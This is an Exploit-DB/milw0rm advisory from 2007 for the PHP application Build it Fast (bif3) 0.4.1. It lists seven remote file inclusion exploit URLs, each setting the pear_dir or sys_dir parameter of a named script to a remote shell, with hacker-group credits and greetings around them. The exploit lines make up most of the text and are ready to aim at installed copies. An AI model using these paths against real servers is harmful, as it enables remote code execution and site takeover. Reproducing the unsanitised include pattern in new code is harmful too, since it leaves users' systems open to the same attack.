Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusions

EDB-ID:

3947




Platform:

PHP

Date:

2007-05-17


# bif3-0.4.1 <=  Remote File Include Vulnerablitiy

# D.Script: http://bif.lunix.com.ar/tgz/bif3-0.4.1.tgz

# Discovered by: Alkomandoz Hacker

# Homepage: asb-may.net & mohandko.com & sniper-sa.com


====================================
# Exploit:[Path]/Base/Application.php?pear_dir=Shell
# Exploit:[Path]/Widgets/Base/Footer.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifContainer.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifRoot.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifRoot2.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifRoot3.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifWarning.php?sys_dir=Shell
====================================

# Thanx:   AsbMay's Group & City Of Ghosts Team & Sniper-sa Team

# Greetz To: Sniper_Sa & Devil-X

# milw0rm.com [2007-05-17]